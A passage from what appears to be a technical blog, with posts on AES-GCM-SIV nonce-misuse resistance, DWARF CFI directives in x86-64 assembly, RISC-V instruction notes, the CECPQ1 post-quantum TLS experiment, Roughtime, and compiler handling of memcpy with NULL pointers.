For example, both TLS and QUIC need to encrypt small messages at the server that can be decrypted by other servers. For TLS, these messages are the session tickets and, in QUIC, they are the source-address tokens. This is an example of a situation where many servers are independently encrypting with the same key and so Google's QUIC implementation is in the process of switching to using AES-GCM-SIV for source-address tokens. (Our TLS implementation may switch too in the future, although that will be more difficult because of existing APIs.)

AEADs that can withstand nonce duplication are called “nonce-misuse resistant” and that name appears to have caused some people to believe that they are infinitely resistant. I.e. that an unlimited number of messages can be encrypted with a fixed nonce with no loss in security. That is not the case, and the term wasn't defined that way originally by Rogaway and Shrimpton (nor does their SIV mode have that property). So it's important to emphasise that AES-GCM-SIV (and nonce-misuse resistant modes in general) are not a magic invulnerability shield. Figure four and section five of the paper give precise bounds but, if in doubt, consider AES-GCM-SIV to be a safety net for accidental nonce duplication and otherwise treat it like a traditional AEAD.

AES-GCM-SIV is supported in BoringSSL now and, while one may not want to use the whole of BoringSSL, the core assembly is ISC licensed. Also, Shay has published reference, assembly and intrinsics versions for those who think AES-GCM-SIV might be useful to them.

CFI directives in assembly files

(This post uses x86-64 for illustration throughout. The fundamentals are similar for other platforms but will need some translation that I don't cover here.)

Despite compilers getting better over time, it's still the case that hand-written assembly can be worthwhile for certain hot-spots. Sometimes there are special CPU instructions for the thing that you're trying to do, sometimes you need detailed control of the resulting code and, to some extent, it remains possible for some people to out-optimise a compiler.

But hand-written assembly doesn't automatically get some of the things that the compiler generates for normal code, such as debugging information. Perhaps your assembly code never crashes (although any function that takes a pointer can suffer from bugs in other code) but you probably still care about accurate profiling information. In order for debuggers to walk up the stack in a core file, or for profilers to correctly account for CPU time, they need to be able to unwind call frames.

Unwinding used to be easy as every function would have a standard prologue:

push rbp
mov rbp, rsp

This would make the stack look like this (remember that stacks grow downwards in memory):

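(higher addresses)
  | Caller's stack             |
  +----------------------------+ <- RSP value before CALL
  | Saved RIP (pushed by CALL) |
  +----------------------------+ <- RSP at function entry
  | Caller's RBP               |
  +----------------------------+ <- RBP always points here
  | Callee's local variables   |
(lower addresses)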

So, upon entry to a function, the CALL instruction that jumped to the function in question will have pushed the previous program counter (from the RIP register) onto the stack. Then the function prologue saves the current value of RBP on the stack and copies the current value of the stack pointer into RBP. From this point until the function is complete, RBP won't be touched.

This makes stack unwinding easy because RBP always points to the call frame for the current function. That gets you the saved address of the parent call and the saved value of its RBP and so on.
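As a sketch of what an unwinder does under this convention, the code below models each call frame as the pair that RBP points at (the saved RBP with the saved RIP just above it) and follows the chain. The struct, the function name and the use of NULL to mark the outermost frame are assumptions for the sake of the example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* What RBP points at under the old convention: the caller's saved RBP,
 * with the return address pushed by CALL directly above it. */
struct frame {
  const struct frame *saved_rbp; /* caller's frame; NULL marks the end here */
  uintptr_t return_address;      /* saved RIP */
};

/* Follows the chain of saved RBP values, writing up to max return
 * addresses to out. Returns the number of addresses written. */
static size_t walk_frames(const struct frame *rbp, uintptr_t *out,
                          size_t max) {
  size_t n = 0;
  while (rbp != NULL && n < max) {
    out[n++] = rbp->return_address;
    rbp = rbp->saved_rbp;
  }
  return n;
}
```

A real unwinder would read these values out of the target's stack memory rather than from C structs, but the loop is the same.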

The problems with this scheme are that a) the function prologue can be excessive for small functions and b) we would like to be able to use RBP as a general purpose register to avoid spills. Which is why the GCC documentation says that “-O also turns on -fomit-frame-pointer on machines where doing so does not interfere with debugging”. This means that you can't depend on being able to unwind stacks like this. A process can be comprised of various shared libraries, any of which might be compiled with optimisations.

To be able to unwind the stack without depending on this convention, additional debugging tables are needed. The compiler will generate these automatically (when asked) for code that it generates, but it's something that we need to worry about when writing assembly functions ourselves if we want profilers and debuggers to work.

The reference for the assembly directives that we'll need is here, but they are very lightly documented. You can understand more by reading the DWARF spec, which documents the data that is being generated. Specifically see sections 6.4 and D.6. But I'll try to tie the two together in this post.

The tables that we need the assembler to emit for us are called Call Frame Information (CFI). (Not to be confused with Control Flow Integrity, which is very different.) Based on that name, all the assembler directives begin with .cfi_.

Next we need to define the Canonical Frame Address (CFA). This is the value of the stack pointer just before the CALL instruction in the parent function. In the diagram above, it's the value indicated by “RSP value before CALL”. Our first task will be to define data that allows the CFA to be calculated for any given instruction.

The CFI tables allow the CFA to be expressed as a register value plus an offset. For example, immediately upon function entry the CFA is RSP + 8. (The eight byte offset is because the CALL instruction will have pushed the previous RIP on the stack.)

As the function executes, however, the expression will probably change. If nothing else, after pushing a value onto the stack we would need to increase the offset.

So one design for the CFI table would be to store a (register, offset) pair for every instruction. Conceptually that's what we do but, to save space, only changes from instruction to instruction are stored.

It's time for an example, so here's a trivial assembly function that includes CFI directives and a running commentary.

  .globl  square
  .type   square,@function
  .hidden square
square:

This is a standard preamble for a function that's unrelated to CFI. Your assembly code should already be full of this.

  .cfi_startproc

Our first CFI directive. This is needed at the start of every annotated function. It causes a new CFI table for this function to be initialised.

  .cfi_def_cfa rsp, 8

This is defining the CFA expression as a register plus offset. One of the things that you'll see compilers do is express the registers as numbers rather than names. But, at least with GAS, you can write names. (I've included a table of DWARF register numbers and names below in case you need it.)

Getting back to the directive, this is just specifying what I discussed above: on entry to a function, the CFA is at RSP + 8.

  push    rbp
  .cfi_def_cfa rsp, 16

After pushing something to the stack, the value of RSP will have changed so we need to update the CFA expression. It's now RSP + 16, to account for the eight bytes we pushed.

  mov     rbp, rsp
  .cfi_def_cfa rbp, 16

This function happens to have a standard prologue, so we'll save the frame pointer in RBP, following the old convention. Thus, for the rest of the function we can define the CFA as RBP + 16 and manipulate the stack without having to worry about it again.

  mov     DWORD PTR [rbp-4], edi
  mov     eax, DWORD PTR [rbp-4]
  imul    eax, DWORD PTR [rbp-4]
  pop     rbp
  .cfi_def_cfa rsp, 8

We're getting ready to return from this function and, after restoring RBP from the stack, the old CFA expression is invalid because the value of RBP has changed. So we define it as RSP + 8 again.

  ret
  .cfi_endproc

At the end of the function we need to trigger the CFI table to be emitted. (It's an error if a CFI table is left open at the end of the file.)

The CFI tables for an object file can be dumped with objdump -W and, if you do that for the example above, you'll see two tables: something called a CIE and something called an FDE.

The CIE (Common Information Entry) table contains information common to all functions and it's worth taking a look at it:

… CIE
  Version:         1
  Augmentation:    "zR"
  Code alignment factor: 1
  Data alignment factor: -8
  Return address column: 16
  Augmentation data:     1b

  DW_CFA_def_cfa: r7 (rsp) ofs 8
  DW_CFA_offset: r16 (rip) at cfa-8

You can ignore everything until the DW_CFA_… lines at the end. They define CFI directives that are common to all functions (that reference this CIE). The first is saying that the CFA is at RSP + 8, which is what we had already defined at function entry. This means that you don't need a CFI directive at the beginning of the function. Basically RSP + 8 is already the default.

The second directive is something that we'll get to when we discuss saving registers.

If we look at the FDE (Frame Description Entry) for the example function that we defined, we see that it reflects the CFI directives from the assembly:

… FDE cie=…
  DW_CFA_advance_loc: 1 to 0000000000000001
  DW_CFA_def_cfa: r7 (rsp) ofs 16
  DW_CFA_advance_loc: 3 to 0000000000000004
  DW_CFA_def_cfa: r6 (rbp) ofs 16
  DW_CFA_advance_loc: 11 to 000000000000000f
  DW_CFA_def_cfa: r7 (rsp) ofs 8

The FDE describes the range of instructions that it's valid for and is a series of operations to either update the CFA expression, or to skip over the next n bytes of instructions. Fairly obvious.
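To show how a consumer of these tables might use them, here is a minimal sketch that replays the FDE dumped above to find the CFA rule in force at a given byte offset into the function. The types and names are invented for illustration and it handles only the two operations that appear in this example, not the full DWARF encoding.

```c
#include <assert.h>
#include <stddef.h>

enum cfi_op_kind { ADVANCE_LOC, DEF_CFA };
enum { REG_RBP = 6, REG_RSP = 7 }; /* DWARF register numbers on x86-64 */

struct cfi_op {
  enum cfi_op_kind kind;
  unsigned reg;   /* DEF_CFA: register number; unused for ADVANCE_LOC */
  unsigned value; /* DEF_CFA: offset; ADVANCE_LOC: bytes to skip */
};

struct cfa_rule {
  unsigned reg;
  unsigned offset;
};

/* The operations from the FDE dump above. */
static const struct cfi_op square_fde[] = {
    {ADVANCE_LOC, 0, 1},  {DEF_CFA, REG_RSP, 16},
    {ADVANCE_LOC, 0, 3},  {DEF_CFA, REG_RBP, 16},
    {ADVANCE_LOC, 0, 11}, {DEF_CFA, REG_RSP, 8},
};

/* Replays ops, starting from the CIE's initial rule (RSP + 8), and
 * returns the rule in force at byte offset pc within the function. */
static struct cfa_rule cfa_rule_at(const struct cfi_op *ops, size_t num_ops,
                                   unsigned pc) {
  struct cfa_rule rule = {REG_RSP, 8};
  unsigned loc = 0;
  for (size_t i = 0; i < num_ops; i++) {
    if (ops[i].kind == ADVANCE_LOC) {
      loc += ops[i].value;
      if (loc > pc) {
        break; /* later operations apply to later instructions */
      }
    } else {
      rule.reg = ops[i].reg;
      rule.offset = ops[i].value;
    }
  }
  return rule;
}
```

For this function, offset 0 gives RSP + 8, offsets 1 to 3 give RSP + 16, offsets 4 to 0xe give RBP + 16 and offset 0xf (the ret) gives RSP + 8 again.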

Optimisations for CFA directives

There are some shortcuts when writing CFA directives:

Firstly, you can update just the offset, or just the register, with cfi_def_cfa_offset and cfi_def_cfa_register respectively. This not only saves typing in the source file, it saves bytes in the table too.

Secondly, you can update the offset with a relative value using cfi_adjust_cfa_offset. This is useful when pushing lots of values to the stack as the offset will increase by eight each time.

Here's the example from above, but using these directives and omitting the first directive that we don't need because of the CIE:

  .globl  square
  .type   square,@function
  .hidden square
square:
  .cfi_startproc
  push    rbp
  .cfi_adjust_cfa_offset 8
  mov     rbp, rsp
  .cfi_def_cfa_register rbp
  mov     DWORD PTR [rbp-4], edi
  mov     eax, DWORD PTR [rbp-4]
  imul    eax, DWORD PTR [rbp-4]
  pop     rbp
  .cfi_def_cfa rsp, 8
  ret
  .cfi_endproc

Saving registers

Consider a profiler that is unwinding the stack after a profiling signal. It calculates the CFA of the active function and, from that, finds the parent function. Now it needs to calculate the parent function's CFA and, from the CFI tables, discovers that it's related to RBX. Since RBX is a callee-saved register, that's reasonable, but the active function might have stomped RBX. So, in order for the unwinding to proceed it needs a way to find where the active function saved the old value of RBX. So there are more CFI directives that let you document where registers have been saved.

Registers can either be saved at an offset from the CFA (i.e. on the stack), or in another register. Most of the time they'll be saved on the stack though because, if you had a caller-saved register to spare, you would be using it first.

To indicate that a register is saved on the stack, use cfi_offset. In the same example as above (see the stack diagram at the top) the caller's RBP is saved at CFA - 16 bytes. So, with saved registers annotated too, it would start like this:

square:
  .cfi_startproc
  push    rbp
  .cfi_adjust_cfa_offset 8
  .cfi_offset rbp, -16

If you need to save a register in another register for some reason, see the documentation for cfi_register.
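Here is a rough sketch of how an unwinder could use those rules once it knows the CFA: the CIE says that RIP is saved at CFA - 8 and the cfi_offset directive above says that RBP is saved at CFA - 16. The toy stack and all of the names are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* A toy stack: slot i models the eight bytes at address base + 8*i. */
struct toy_stack {
  uint64_t base;
  const uint64_t *slots;
};

static uint64_t load64(const struct toy_stack *s, uint64_t addr) {
  return s->slots[(addr - s->base) / 8];
}

struct caller_state {
  uint64_t rip, rbp, rsp;
};

/* Applies "rip at cfa-8" (from the CIE) and "rbp at cfa-16" (from
 * cfi_offset rbp, -16) to recover the caller's registers. */
static struct caller_state unwind_one(const struct toy_stack *s,
                                      uint64_t cfa) {
  struct caller_state c;
  c.rip = load64(s, cfa - 8);
  c.rbp = load64(s, cfa - 16);
  c.rsp = cfa; /* the CFA is the caller's RSP just before the CALL */
  return c;
}
```

With the caller's state recovered, the unwinder can look up the caller's own CFI tables and repeat the process for the next frame up.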

If you get all of that correct then your debugger should be able to unwind crashes correctly, and your profiler should be able to avoid recording lots of detached functions. However, I'm afraid that I don't know of a better way to test this than to zero RBP, add a crash in the assembly code, and check whether GDB can go up correctly.

(None of this works for Windows. But Per Vognsen, via Twitter, notes that there are similar directives in MASM.)

CFI expressions

New in version three of the DWARF standard are CFI Expressions. These define a stack machine for calculating the CFA value and can be useful when your stack frame is non-standard (which is fairly common in assembly code). However, there's no assembler support for them that I've been able to find, so one has to use cfi_escape and provide the raw DWARF data in a .s file. As an example, see this kernel patch.

Since there's no assembler support, you'll need to read section 2.5 of the standard, then search for DW_CFA_def_cfa_expression and, perhaps, search for cfi_directive in OpenSSL's perlasm script for x86-64 and the places in OpenSSL where that is used. Good luck.

(I suggest testing by adding some instructions that write to NULL in the assembly code and checking that gdb can correctly step up the stack and that info reg shows the correct values for callee-saved registers in the parent frame.)

CFI register numbers

In case you need to use or read the raw register numbers, here they are for a few architectures:

Register number  x86-64  x86                        ARM
0                RAX     EAX                        r0
1                RDX     ECX                        r1
2                RCX     EDX                        r2
3                RBX     EBX                        r3
4                RSI     ESP (may be EBP on MacOS)  r4
5                RDI     EBP (may be ESP on MacOS)  r5
6                RBP     ESI                        r6
7                RSP     EDI                        r7
8                R8                                 r8
9                R9                                 r9
10               R10                                r10
11               R11                                r11
12               R12                                r12
13               R13                                r13
14               R14                                r14
15               R15                                r15
16               RIP

(x86 values taken from page 25 of this doc. x86-64 values from page 57 of this doc. ARM taken from page 7 of this doc.)

RISC-V assembly

RISC-V is a new, open instruction set. Fabrice Bellard wrote a Javascript emulator for it that boots Linux here (more info). I happen to have just gotten a physical chip that implements it too (one of these) and what's cool is that you can get the source code to the chip on GitHub.

The full, user-level instruction set is documented but there's a lot of information in there. I wanted a brief summary of things that I could keep in mind when reading disassembly. This blog post is just a dump of my notes; it's probably not very useful for most people! It also leaves out a lot of things that come up less frequently. There's also an unofficial reference card which is good, but still aimed a little low for me.

RISC-V is little-endian and comes in 32 and 64 bit flavours. In keeping with the RISC-V documents, the flavour (either 32 or 64) is called XLEN below in the few places where it matters.

For both, int is 32 bits. Pointers and long are the native register size. Signed values are always sign extended in a larger register and unsigned 8- and 16-bit values are zero extended. But unsigned 32-bit values are sign-extended. Everything has natural alignment in structs and the like, but alignment isn't required by the hardware.

The stack grows downwards and is 16-byte aligned upon entry to a function.

Instructions are all 32 bits and 32-bit aligned. There is a compressed-instruction extension that adds 16-bit instructions and changes the required alignment of all instructions to just 16 bits. Unlike Thumb on ARM, RISC-V compressed instructions are just a short-hand for some 32-bit instruction and 16- and 32-bit instructions can be mixed freely.

There are 31 general purpose registers called x1–x31. Register x0 drops all writes and always reads as zero. Each register is given an alias too, which describes their conventional use:

Register  Alias  Description                     Saved by
x0        zero   Zero
x1        ra     Return address                  Caller
x2        sp     Stack pointer                   Callee
x3        gp     Global pointer
x4        tp     Thread pointer
x5–7      t0–2   Temporary                       Caller
x8        s0/fp  Saved register / frame pointer  Callee
x9        s1     Saved register                  Callee
x10–17    a0–7   Arguments and return values     Caller
x18–27    s2–11  Saved registers                 Callee
x28–31    t3–6   Temporary                       Caller

There are two types of immediates, which will be written as ‘I’ and ‘J’. Type ‘I’ immediates are 12-bit, signed values and type ‘J’ are 20-bit, signed values. They are always sign-extended to the width of a register before use.

Arithmetic

There's no carry flag, instead one has to use a comparison instruction on the result in order to get the carry in a register.
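As a sketch of that idiom, the C below mirrors an ADD followed by an SLTU of the sum against one of the inputs, assuming XLEN is 64. The function name is mine.

```c
#include <assert.h>
#include <stdint.h>

/* Mirrors `add sum,a,b` followed by `sltu carry,sum,a` with XLEN = 64. */
static uint64_t add_with_carry(uint64_t a, uint64_t b, uint64_t *carry_out) {
  uint64_t sum = a + b;  /* ADD: wraps modulo 2^64 */
  *carry_out = sum < a;  /* SLTU: 1 if the addition wrapped, else 0 */
  return sum;
}
```

The unsigned sum is smaller than an input exactly when the addition wrapped, so the comparison recovers the carry bit.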

A U suffix indicates an unsigned operation. Note that the multiplication and division instructions are part of the ‘M’ extension, but I expect most chips to have them.

Instruction                 Effect                        Notes
ADD dest,src1,src2          dest = src1 + src2
SUB dest,src1,src2          dest = src1 - src2
ADDI dest,src1,I            dest = src1 + I
MUL dest,src1,src2          dest = src1 × src2
MULH[|U|SU] dest,src1,src2  dest = (src1 × src2) >> XLEN  This returns the high word of the multiplication result for signed×signed, unsigned×unsigned or signed×unsigned, respectively
DIV[U] dest,src1,src2       dest = src1/src2              There's no trap on divide-by-zero, rather special values are returned. (See documentation.)
REM[U] dest,src1,src2       dest = src1%src2
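For reference, here is my understanding of those special values from the ‘M’ extension, written as a C model with XLEN = 64. The function names are invented, and the C has to special-case these inputs because they are undefined behaviour in C itself.

```c
#include <assert.h>
#include <stdint.h>

/* Models DIV: division by zero gives all ones, and the one overflowing
 * case (most-negative value divided by -1) gives the dividend back. */
static int64_t rv64_div(int64_t a, int64_t b) {
  if (b == 0) return -1;
  if (a == INT64_MIN && b == -1) return a;
  return a / b; /* truncates towards zero, like the hardware */
}

/* Models REM: remainder by zero gives the dividend; overflow gives 0. */
static int64_t rv64_rem(int64_t a, int64_t b) {
  if (b == 0) return a;
  if (a == INT64_MIN && b == -1) return 0;
  return a % b;
}

/* Models DIVU: division by zero gives the largest unsigned value. */
static uint64_t rv64_divu(uint64_t a, uint64_t b) {
  return b == 0 ? UINT64_MAX : a / b;
}
```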

Bitwise

These should all be obvious:

Instruction
AND dest,src1,src2
OR dest,src1,src2
XOR dest,src1,src2
ANDI dest,src1,I
ORI dest,src1,I
XORI dest,src1,I

Shifts

Instructions here are Shift [Left|Right] [Logical|Arithmetic].

Note that only the minimal number of bits are read from the shift count. So shifting by the width of the register doesn't zero it, it does nothing.

Instruction             Effect                    Notes
SLL dest,src1,src2      dest = src1 << src2%XLEN
SRL dest,src1,src2      dest = src1 >> src2%XLEN
SRA dest,src1,src2      dest = src1 >> src2%XLEN
SLLI dest,src1,0‥31/63  dest = src1 << I
SRLI dest,src1,0‥31/63  dest = src1 >> I
SRAI dest,src1,0‥31/63  dest = src1 >> I
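A quick C model of the register-count shifts on a 64-bit chip shows the effect of only reading the low bits of the count. (In C itself, shifting a 64-bit value by 64 or more is undefined, hence the explicit mask.) The function names are mine.

```c
#include <assert.h>
#include <stdint.h>

/* Models SLL with XLEN = 64: only the low six bits of src2 are used. */
static uint64_t rv64_sll(uint64_t src1, uint64_t src2) {
  return src1 << (src2 & 63);
}

/* Models SRL with XLEN = 64. */
static uint64_t rv64_srl(uint64_t src1, uint64_t src2) {
  return src1 >> (src2 & 63);
}
```

So a shift count of 64 behaves like a count of zero, and a count of 65 behaves like a count of one.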

Comparisons

These instructions set the destination register to one or zero depending on whether the relation is true or not.

Instruction          Effect            Notes
SLT dest,src1,src2   dest = src1<src2  (signed compare)
SLTU dest,src1,src2  dest = src1<src2  (unsigned compare)
SLTI dest,src1,I     dest = src1<I     (signed compare)
SLTIU dest,src1,I    dest = src1<I     (unsigned compare, but remember that the immediate is sign-extended first)
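The SLTIU note is easy to trip over, so here is a small C model with XLEN = 64. The immediate is passed as its raw 12-bit encoding and the helper names are assumptions of mine.

```c
#include <assert.h>
#include <stdint.h>

/* Sign-extends a 12-bit type 'I' immediate (given in the low 12 bits)
 * to 64 bits. */
static uint64_t sext12(uint32_t imm12) {
  uint64_t v = imm12 & 0xfff;
  return (v ^ 0x800) - 0x800;
}

/* Models SLTIU: unsigned compare against the sign-extended immediate. */
static uint64_t rv64_sltiu(uint64_t src1, uint32_t imm12) {
  return src1 < sext12(imm12);
}
```

An immediate of -1 (encoded as 0xfff) therefore compares against the largest unsigned value, so the result is one for every input except all-ones. An immediate of 1 gives an "is zero" test.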

Control flow

The JAL[R] instructions write the address of the next instruction to the destination register for the subsequent return. This can be x0 if you don't care.

Many instructions here take an immediate that is doubled before use. That's because no instruction (even with compressed instructions) can ever start on an odd address. However, when you write the value in assembly you write the actual value; the assembler will halve it when encoding.

Instruction       Effect                        Notes
JAL dest,J        dest = pc+2/4; pc+=2*J
JALR dest,src,I   dest = pc+2/4; pc=(src+I)&~1  Note that the least-significant bit of the address is ignored
BEQ src1,src2,I   if src1==src2, pc+=2*I
BNE src1,src2,I   if src1!=src2, pc+=2*I
BLT src1,src2,I   if src1<src2, pc+=2*I         signed compare
BLTU src1,src2,I  if src1<src2, pc+=2*I         unsigned compare
BGE src1,src2,I   if src1>=src2, pc+=2*I        signed compare
BGEU src1,src2,I  if src1>=src2, pc+=2*I        unsigned compare

Memory

The suffix on these instructions denotes the size of the value read or written: ‘D’ = double-word (64 bits), ‘W’ = word (32 bits), ‘H’ = half-word (16 bits), ‘B’ = byte. Reading and writing 64-bit values only works on 64-bit systems, and LWU only exists on 64-bit systems because it's the same as LW otherwise.

Alignment is not required, but might be faster. Also note that there's no consistent direction of data flow in the textual form of the assembly: the register always comes first.

Instruction              Effect              Notes
L[D|W|H|B] dest,I(src)   dest = *(src + I)   result is sign extended
L[W|H|B]U dest,I(src)    dest = *(src + I)   result is zero extended
S[D|W|H|B] src1,I(src2)  *(src2 + I) = src1

Other

Instruction   Effect             Notes
LUI dest,J    dest = J<<12       “Load Upper Immediate”. The result is sign extended on 64-bit.
AUIPC dest,J  dest = pc + J<<12  “Add Upper Immediate to PC”. The result of the shift is sign-extended on 64-bit before the addition.

W instructions

These instructions only exist on 64-bit and are copies of the same instruction without the ‘W’ suffix, except that they operate only on the lower 32 bits of the registers and, when writing the result, sign-extend to 64 bits. They are ADDW, SUBW, ADDIW, MULW, DIV[U]W, REM[U]W, S[L|R]LW, SRAW, S[L|R]LIW and SRAIW.
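Here is a C model of ADDW next to plain ADD to show the difference. Registers are modelled as uint64_t and the helper names are mine.

```c
#include <assert.h>
#include <stdint.h>

/* Sign-extends a 32-bit value to 64 bits. */
static uint64_t sext32(uint32_t v) {
  return ((uint64_t)v ^ 0x80000000u) - 0x80000000u;
}

/* Models ADD on a 64-bit chip. */
static uint64_t rv64_add(uint64_t a, uint64_t b) {
  return a + b;
}

/* Models ADDW: add the low 32 bits, then sign-extend the 32-bit result. */
static uint64_t rv64_addw(uint64_t a, uint64_t b) {
  return sext32((uint32_t)(a + b));
}
```

Adding one to 0x7fffffff gives 0x80000000 with ADD but 0xffffffff80000000 with ADDW, which is what keeps a C int correctly sign-extended in a 64-bit register.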

Pseudo-instructions

For clarity, there are also a number of pseudo-instructions defined. These are just syntactic sugar for one of the primitive instructions, above. Here's a handful of the more useful ones:

Pseudo-instruction          Translation
nop                         addi x0,x0,0
mv dest,src                 addi dest,src,0
not dest,src                xori dest,src,-1
seqz dest,src               sltiu dest,src,1
snez dest,src               sltu dest,x0,src
j J                         jal x0,J
ret                         jalr x0,x1,0
call offset                 auipc x6, offset >> 12; jalr x1,x6,offset & 0xfff
li dest,value               (possibly several instructions to load arbitrary value)
la dest,symbol              auipc dest, symbol >> 12; addi dest,dest,offset & 0xfff
l[d|w|h|b] dest,symbol      auipc dest, symbol >> 12; lx dest,offset & 0xfff(dest)
s[d|w|h|b] src,symbol,tmp   auipc tmp, symbol >> 12; sx src,offset & 0xfff(tmp)

Note that the instructions that expand to two instructions where the first is AUIPC aren't quite as simple as they appear. Since the 12-bit immediate in the second instruction is sign extended, it could end up negative. If that happens, the J immediate for AUIPC needs to be one greater and then you can reach the value by subtracting from there.
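A sketch of that adjustment for a 32-bit PC-relative offset follows. The struct and function names are invented, and hi20 holds the raw 20-bit field rather than a signed value.

```c
#include <assert.h>
#include <stdint.h>

struct hi_lo {
  uint32_t hi20; /* raw 20-bit immediate for AUIPC */
  int32_t lo12;  /* sign-extended 12-bit immediate for the second instruction */
};

/* Splits offset so that (hi20 << 12) + lo12 == offset, modulo 2^32. */
static struct hi_lo split_offset(int32_t offset) {
  struct hi_lo r;
  uint32_t u = (uint32_t)offset;
  uint32_t low = u & 0xfff;
  /* The low 12 bits are sign-extended by the second instruction. */
  r.lo12 = (int32_t)low - ((low & 0x800) ? 0x1000 : 0);
  /* Adding 0x800 first bumps the upper part by one exactly when lo12
   * will be negative. */
  r.hi20 = ((u + 0x800) >> 12) & 0xfffff;
  return r;
}

/* Recombines the two parts the way the instruction pair does. */
static uint32_t recombine(struct hi_lo r) {
  return (r.hi20 << 12) + (uint32_t)r.lo12;
}
```

For example, an offset of 0x1800 splits into an upper part of 2 and a lower part of -2048, rather than 1 and 0x800.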

CECPQ1 results

In July my colleague, Matt Braithwaite, announced that Chrome and Google would be experimenting with a post-quantum key-agreement primitive in TLS. One should read the original announcement for details, but we had two goals for this experiment:

Firstly we wanted to direct cryptanalytic attention at the family of Ring Learning-with-Errors (RLWE) problems. The algorithm that we used, NewHope, is part of this family and appeared to be the most promising when we selected one at the end of 2015.

It's very difficult to know whether we had any impact here, but it's good to see the recent publication and withdrawal of a paper describing a quantum attack on a fundamental lattice problem. Although the algorithm contained an error, it still shows that capable people are testing these new foundations.

Our second goal was to measure the feasibility of deploying post-quantum key-agreement in TLS by combining NewHope with an existing key-agreement (X25519). We called the combination CECPQ1.

TLS key agreements have never been so large and we expected a latency impact from the extra network traffic. Also, any incompatibilities with middleboxes can take years to sort out, so it's best to discover them as early as possible.

Here the results are more concrete: we did not find any unexpected impediment to deploying something like NewHope. There were no reported problems caused by enabling it.

Although the median connection latency only increased by a millisecond, the latency for the slowest 5% increased by 20ms and, for the slowest 1%, by 150ms. Since NewHope is computationally inexpensive, we're assuming that this is caused entirely by the increased message sizes. Since connection latencies compound on the web (because subresource discovery is delayed), the data requirement of NewHope is moderately expensive for people on slower connections.

None the less, if the need arose, it would be practical to quickly deploy NewHope in TLS 1.2. (TLS 1.3 makes things a little more complex and we did not test CECPQ1 with it.)

At this point the experiment is concluded. We do not want to promote CECPQ1 as a de-facto standard and so a future Chrome update will disable CECPQ1 support. It's likely that TLS will want a post-quantum key-agreement in the future but a more multilateral approach is preferable for something intended to be more than an experiment.

Roughtime

Security protocols often assume an accurate, local clock (e.g. TLS, Kerberos, DNSSEC and more). It's a widely accepted assumption when designing protocols but, for a lot of people, it just isn't true. We find good evidence that at least 25% of all certificate errors in Chrome are due to a bad local clock.

Even when the local clock is being synchronised, it's very likely to be using unauthenticated NTP. So if your threat model includes man-in-the-middle attackers then you still can't trust the local clock.

There have been efforts to augment NTP with authentication, but they still assume a world where each client trusts one or more time servers absolutely. In order to explore a solution that allows time servers to be effectively audited by clients, my colleague Matt Braithwaite and I (with assistance and advice from Ben Laurie and Michael Shields) have developed Roughtime.

Very briefly: using some tricks we believe that it's viable to deploy servers that sign a client-chosen nonce and timestamp on demand. Once you have several of these servers, clients can generate their nonces by hashing replies from other servers with some entropy. That proves that a nonce was created after the reply was received. Clients maintain a chain of nonces and replies and, if a server misbehaves, can use replies from several other servers to prove and report it.

Currently there's only one Roughtime service running, so the idea of spreading trust around is inchoate. But we would like to gauge whether others are interested in this idea, specifically whether there are any organisations who would be seriously interested in deploying something like this in their clients. (Because I assume that, if you have clients, then you'll also be interested in running a server.)

There's a much longer introduction and many more details on the Roughtime site and we've also set up a mailing list.

memcpy (and friends) with NULL pointers

The C standard (ISO/IEC 9899:2011) has a sane-seeming definition of memcpy (section 7.24.2.1):

The memcpy function copies n characters from the object pointed to by s2 into the object pointed to by s1.

Apart from a prohibition on passing overlapping objects, I think every C programmer understands that.

However, the standard also says (section 7.1.4):

If an argument to a function has an invalid value (such as a value outside the domain of the function, or a pointer outside the address space of the program, or a null pointer, or a pointer to non-modifiable storage when the corresponding parameter is not const-qualified) or a type (after promotion) not expected by a function with variable number of arguments, the behavior is undefined.

(Emphasis is mine.)

I'm sure that 7.1.4 seemed quite reasonable in isolation, but how does it interact with the case where memcpy is called with a zero length? If you read 7.24.2.1 then you might well think that, since the function copies zero bytes, it's valid to pass NULL as either of the pointer arguments. I claim that the vast majority of C programmers would agree with that, but 7.24.1(2) clarifies that 7.1.4 really does apply:

Where an argument declared as size_t n specifies the length of the array for a function, n can have the value zero […] pointer arguments on such a call shall still have valid values, as described in 7.1.4.

(Nobody would actually write memcpy(NULL, NULL, 0), of course, because it (at best) does nothing. But such a call can easily arise at run-time when an empty object is handled by a more general function.)

Some compilers will use this corner of the standard to assume that pointers passed to memcpy are non-NULL, irrespective of the length argument. GCC has built this in, while Clang can get it from the fact that glibc annotates memcpy with nonnull specifications.

Consider the following function:

#include <stdint.h>
#include <string.h>

int f(uint8_t *dest, uint8_t *src, size_t len) {
  memcpy(dest, src, len);
  return dest == NULL;
}

Here's the output of building that with GCC 6.1.1 with -O2:

0000000000000000 <f>:
   0:	48 83 ec 08          	sub    rsp,0x8
   4:	e8 00 00 00 00       	call   9 <f+0x9>  # memcpy
   9:	31 c0                	xor    eax,eax
   b:	48 83 c4 08          	add    rsp,0x8
   f:	c3                   	ret

From that we can see that rax (which holds the return value of a function in the amd64 ABI) is unconditionally set to zero, i.e. the compiler has assumed that dest == NULL is false because it has been passed to memcpy. The compiler's reasoning goes like this: 7.1.4 says that passing a NULL pointer to a standard library function is undefined behaviour, therefore if dest was NULL any behaviour is reasonable. So the code can be optimised with the assumption that it's non-NULL, as that's the only case with defined behaviour.

(You can also play with this snippet in Matt Godbolt's excellent tool.)

Opinions on this vary from “the C standard defines the language, thus that optimisation is fine by definition” to “that's crazy: there's a huge amount of code out there that probably assumes the obvious behaviour of memcpy”. Personally, I find myself further towards the latter position than the former.

Also, it's not just memcpy: the same nonnull annotations appear in glibc for (at least) memccpy, memset, memcmp, memchr, memrchr, memmem, mempcpy, bcopy and bcmp. Section 7.1.4 can be applied to any standard library function.
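One defensive option, if you can't be sure that empty objects never reach these calls, is a wrapper that skips the library call when the length is zero. This is only a sketch, and the name memcpy_allow_null is made up for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical wrapper: never hands a possibly-NULL pointer to memcpy
 * when there is nothing to copy. */
static void *memcpy_allow_null(void *dest, const void *src, size_t n) {
  if (n == 0) {
    return dest;
  }
  return memcpy(dest, src, n);
}
```

Because memcpy is only reached when n is non-zero, the compiler can only assume that the pointers are non-NULL on that path, so a later NULL check on dest still works in the zero-length case.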

Measurement

